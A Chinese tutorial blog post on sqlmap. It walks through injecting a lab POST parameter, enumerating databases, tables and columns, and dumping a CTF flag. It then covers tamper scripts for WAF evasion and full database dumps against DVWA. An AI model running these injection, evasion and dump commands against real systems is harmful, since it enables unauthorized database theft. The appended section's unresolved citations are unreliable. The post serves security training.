【sqlmap使用】

sqlmap简介

sqlmap 目录结构

请添加图片描述

sqlmap常用参数

请添加图片描述
请添加图片描述

sqlmap实现注入

测试注入点,检测到注入点后,直接爆数据库名

python sqlmap.py –u http://172.16.12.2/7/9/strsql.php  --data "username=admin" --dbs

请添加图片描述
注意sqlmap在使用过程中可能会出现几个需要输入的参数y/n, 按照下面的输入就可以

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n

injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] n
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n

若电脑上存在多个版本的python,在使用时需指定python版本,注意下面的python2:
请添加图片描述
后面的 --data “username=admin” 意思是strsql.php这个文件的参数是username,data的意思是post方式提交的:
请添加图片描述
跑出来后的结果是web,还帮我们确认了数据库的版本号:
请添加图片描述

拿表名
python sqlmap.py -u "http://172.16.12.2/7/9/strsql.php"  --data "username=admin" -D web --tables
表名:zflag,user

拿列名
python sqlmap.py -u "http://172.16.12.2/7/9/strsql.php"  --data "username=admin" -D web -T zflag --columns
拿到列名
列名:flag
类型:varchar(40)

拿数据
python sqlmap.py -u "http://172.16.12.2/7/9/strsql.php"  --data "username=admin" -D web -T zflag -C flag --dump
### 关于 SQLMap 使用教程 #### 工具概述 SQLMap 是一个功能强大的自动化 SQL 注入工具,可以用来检测并利用 SQL 注入漏洞以接管数据库服务器。此工具不仅能够识别不同类型的注入点,还能执行多种攻击向量,并支持广泛的数据库管理系统 (DBMS)[^2]。 #### 常用参数说明 为了有效地使用 SQLMap 进行安全评估,了解一些基本命令行选项是非常重要的: - `-u` 或 `--url`: 指定目标 URL。 - `--data`: 提交 POST 数据给指定的目标页面。 - `--cookie`: 设置 HTTP Cookie 头中的值。 - `--level=<LEVEL>`: 设定测试级别,默认为 1;范围是从 1 到 5。 - `--risk=<RISK>`: 定义风险等级,默认为 1;可选值有 0, 1, 2 和 3。 - `--batch`: 自动选择默认选项而不提示用户输入。 - `--threads=<THREADS>`: 并发线程数(默认为 1),增加速度但可能引起更多噪音[^3]. ```bash sqlmap -u "http://example.com/vulnerable.php?id=1" ``` 这段代码展示了如何通过提供带有潜在注入点的 GET 请求来启动一次简单的扫描操作[^4]。 #### Tamper 脚本应用 Tamper 脚本允许修改请求包的内容,在某些情况下可以帮助绕过 Web 应用防火墙(WAF)或其他防护措施。例如,“randomcase.py” tamper 可随机改变大小写,从而混淆 WAF 的规则匹配机制[^1]: ```bash sqlmap -u "http://example.com/vulnerable.php?id=1" --tamper=randomcase.py ``` #### 实际案例分析 考虑这样一个场景——在一个低级别的 DVWA(Damn Vulnerable Web Application)环境中练习 SQL 注入技巧。这里展示了一个具体的应用实例,其中包含了从发现到提取敏感信息的过程[^5]。 ```bash # 发现注入点 sqlmap -u "http://dvwa.local/vulnerabilities/sqli/?id=1&Submit=Submit#" --dbms=mysql --dump-all --batch # 绕过 magic_quotes_gpc 防护 sqlmap -u "http://targetsite.com/index.php?search=test" --tamper=between.py --technique=B --level=5 --risk=3 ``` 上述命令分别演示了怎样在已知存在 SQLi 缺陷的服务上进行全面的数据转储以及采用特定技术手段规避 PHP 中启用的安全特性 Magic Quotes GPC 对单引号和双引号进行转义的影响。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值